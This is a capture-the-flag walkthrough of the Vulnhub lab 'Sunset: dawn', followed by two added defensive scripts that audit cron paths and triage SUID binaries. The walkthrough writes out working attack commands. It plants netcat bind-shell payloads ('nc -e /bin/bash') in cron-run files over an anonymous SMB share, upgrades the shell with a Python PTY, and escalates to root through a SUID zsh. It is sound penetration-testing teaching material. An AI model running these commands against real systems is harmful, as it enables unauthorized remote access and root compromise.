Today we are going to solve another CTF challenge called “Sunset: dawn”. It is available on Vulnhub for penetration testing practice. This is a box from the Sunset series. The credit for making this lab goes to “whitecr0wz”.
Let’s start and learn how to successfully breach it.
Level: Intermediate
Since these labs are available on the Vulnhub website, we will be downloading the lab file from this link.
Penetration Testing Methodology
Network Scanning
· Netdiscover
· Nmap
Enumeration
· Browsing HTTP Service
· Performing Directory Bruteforce
· Enumerating log files
· Enumerating SMB using Enum4linux
Exploiting
· Connecting via SMB
· Sending files with netcat invocation
Privilege Escalation
· SUID bit on zsh
Capture the flag
Walkthrough
Network Scanning
We will be running this lab in VMware Player or VirtualBox. After starting the lab, we used the netdiscover command to find the IP address of the lab.
netdiscover
It was found to be 192.168.1.165.
Now we will run an aggressive port scan with nmap to gather information about the open ports and the services running on the target machine.
nmap -A 192.168.1.165
We learned from the scan that port 80 is open and hosting an Apache httpd service, and that ports 139, 445 and 3306 are open as well. This tells us that NetBIOS/SMB and MySQL services are running on the target machine.
Enumeration
Since port 80 was open, we decided to browse to the IP address in the browser. We were given an unavailable error as shown in the given image.
We also started a directory brute-force to enumerate the machine further. This gave us a directory called “logs” as shown in the given image.
dirb http://192.168.1.165/
Upon finding the logs directory, we opened the URL in our browser. This listed a number of log files such as auth.log, daemon.log, error.log and management.log. We tried to access all of them but got a forbidden message for every file except management.log.
So, we downloaded management.log and used the cat command to read it on our attacker machine (Kali Linux). Here we see that there is a directory named “ITDEPT”. It contains two files, product-control and web-control. As these files were mentioned alongside cron, we can safely say that they are being executed by a background task.
cd Downloads
cat management.log
Back to the nmap port scan: we found that there is a NetBIOS/SMB service, so it’s time to enumerate this machine’s SMB service. There are multiple ways to do this, about which you can learn from here. Here we decided to use the Enum4Linux script. This shows the ITDEPT directory we found earlier, which means this directory is accessible as an SMB share.
enum4linux -a 192.168.1.165
Also, as we explored the results of Enum4Linux, we saw that there are two users, “dawn” and “ganimedes”.
Exploitation
Since we found the ITDEPT share in our enumeration, we tried to access it over SMB as shown in the image, giving a blank password to log in. Upon logging in we ran the ls command and found nothing in it. We ran ls again with the -al parameters to see if we had missed any hidden files, but couldn’t find any.
smbclient //192.168.1.165/ITDEPT
ls
ls -al
But this doesn’t mean that we cannot create files in it. We went back to our terminal and created files named “product-control” and “web-control”. We chose these names because, while enumerating management.log earlier, we saw that files with these names were executed again and again by cron. We also placed a netcat shell invocation in those files using the echo command.
echo "nc -e /bin/bash -lvp 1234 &" > product-control
echo "nc -e /bin/bash -lvp 1234 &" > web-control
ls
Now, back in the SMB shell, we transferred the files we had just created to the target system using the put command. Both files transferred successfully. After the transfer, we ran the ls command to check whether the files were indeed on the system. As seen in the image given below, our files are now on the target system.
put product-control
put web-control
ls
Now we went back to our browser to view the logs directory. From there we downloaded the management.log file again, to check whether the files we had just created had been executed. As shown in the image, the files were executed by cron on the target system.
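The chain above works because cron runs scripts from a directory that other users can write to, so anyone who can reach that directory decides what runs as the cron job’s user. As an added defensive example (not part of the original walkthrough), the following POSIX shell script reads system-crontab lines (`min hour dom mon dow user command`, or `@reboot user command`) from stdin and reports every absolute command path that is itself writable by group/other, that lives in such a directory, or that does not exist yet in such a directory (the ITDEPT case, where the cron target was missing until the attacker created it). The file and directory names in the usage comment are assumptions; a live run needs root to read other users’ crontabs.

```shell
#!/bin/sh
# Added example (not from the original walkthrough): audit cron entries for
# scripts that live in a directory other users can write to. That is exactly
# what let an uploaded "product-control" get executed as a cron job above.
# Input: system-crontab lines (min hour dom mon dow user command ...) on stdin.

# Succeeds if PATH grants write permission to group or other (columns 6 and 9
# of the ls -ld mode string). Fails if the path does not exist.
writable_by_others() {
  mode=$(ls -ld "$1" 2>/dev/null | cut -c1-10)
  [ -n "$mode" ] || return 1
  case "$mode" in
    ?????w????|????????w?) return 0 ;;
    *) return 1 ;;
  esac
}

audit_cron() {
  while IFS= read -r entry || [ -n "$entry" ]; do
    case "$entry" in ""|\#*) continue ;; esac
    # The command sits in column 3 for @reboot-style entries and in column 7
    # after the five time fields plus user. Only absolute paths are checked;
    # "sh -c ..." style commands are skipped by this simple parser.
    case "$entry" in
      @*) cmd=$(printf '%s\n' "$entry" | awk '{ print $3 }') ;;
      *)  cmd=$(printf '%s\n' "$entry" | awk '{ print $7 }') ;;
    esac
    case "$cmd" in /*) ;; *) continue ;; esac
    dir=$(dirname "$cmd")
    if [ ! -e "$cmd" ]; then
      # Missing target in a writable directory: anyone can create it.
      if writable_by_others "$dir"; then
        printf 'RISK: %s does not exist yet and %s is writable by others (anyone can create it)\n' "$cmd" "$dir"
      fi
    elif writable_by_others "$cmd"; then
      printf 'RISK: %s is writable by others\n' "$cmd"
    elif writable_by_others "$dir"; then
      printf 'RISK: %s can be replaced because %s is writable by others\n' "$cmd" "$dir"
    fi
  done
}

# Live usage (assumed paths; needs root):
#   cat /etc/crontab /etc/cron.d/* | audit_cron
if [ "${1:-}" = "--system" ]; then
  cat /etc/crontab /etc/cron.d/* 2>/dev/null | audit_cron
fi
```

The fix for any RISK line is the same in each case: move the script to a root-owned directory with mode 755 (or tighter), own the script by root, and never point cron at a path inside an SMB share or other user-writable location.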
Now we ran netcat to connect to this listener on the target machine and got our shell. This was an improper shell, so we used the Python one-liner to convert it into a proper one. After the conversion we saw that the shell we had was that of the user dawn.
nc 192.168.1.165 1234
python -c 'import pty;pty.spawn("/bin/bash")'
Privilege Escalation
Now that we had a shell, it was standard practice to check for any file with SUID permissions with the help of the find command. Using the following command, we enumerated all binaries with SUID permissions:
find / -perm -u=s -type f 2>/dev/null
whoami
/usr/bin/zsh
whoami
cd /root
ls
cat flag.txt
The find command showed that the zsh binary could help us escalate privileges on this machine. We ran zsh and checked our status with the whoami command. We were root. Now it was time to look for the flag. We moved into the root directory and found the flag.txt file. This concludes this CTF.
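A SUID shell is the whole privilege escalation here: no bug is needed, the permission bit alone hands out root. As an added defensive example (not part of the original walkthrough), the following POSIX shell function triages a list of SUID binaries, such as the output of the find command above, into CRITICAL (shells, interpreters, editors and pagers that execute arbitrary commands, which must never be SUID), OK (well-known distro defaults that only need to stay patched) and REVIEW (anything else, to be checked against the package manager and a known-good baseline). The baseline lists are assumptions drawn from common Debian-style installs; adjust them for your own fleet.

```shell
#!/bin/sh
# Added example (not from the original walkthrough): triage SUID binaries.
# A SUID shell such as /usr/bin/zsh gives any local user a root shell, so the
# triage sorts paths into CRITICAL (programs that run arbitrary commands),
# OK (common distro defaults) and REVIEW (everything else).
# Input: one path per line, e.g. from: find / -perm -u=s -type f 2>/dev/null

flag_suid() {
  while IFS= read -r path || [ -n "$path" ]; do
    [ -n "$path" ] || continue
    name=${path##*/}   # basename without spawning a process
    case "$name" in
      # Shells, interpreters, editors, pagers and tools with exec features.
      sh|bash|dash|zsh|ksh|csh|tcsh|fish|python*|perl*|ruby*|php*|lua*|node|vi|vim|nano|less|more|env|find|awk|gawk|mawk|nc|ncat|socat)
        printf 'CRITICAL: %s is SUID and executes arbitrary commands\n' "$path" ;;
      # Assumed baseline of SUID binaries shipped by typical distributions.
      passwd|su|sudo|mount|umount|chsh|chfn|newgrp|gpasswd|pkexec|fusermount|fusermount3|ssh-keysign)
        printf 'OK: %s is a common distro default (keep it patched)\n' "$path" ;;
      *)
        printf 'REVIEW: %s is SUID and not in the baseline\n' "$path" ;;
    esac
  done
}

# Live usage: the same find the walkthrough uses, piped into the triage.
if [ "${1:-}" = "--system" ]; then
  find / -perm -u=s -type f 2>/dev/null | flag_suid
fi
```

Every CRITICAL line is a finding to fix immediately (`chmod u-s` on the binary and a check of who set the bit and when, since on this box it is the intended weakness rather than an accident); REVIEW lines are compared with `dpkg -S` or `rpm -qf` output and with a baseline captured from a clean install.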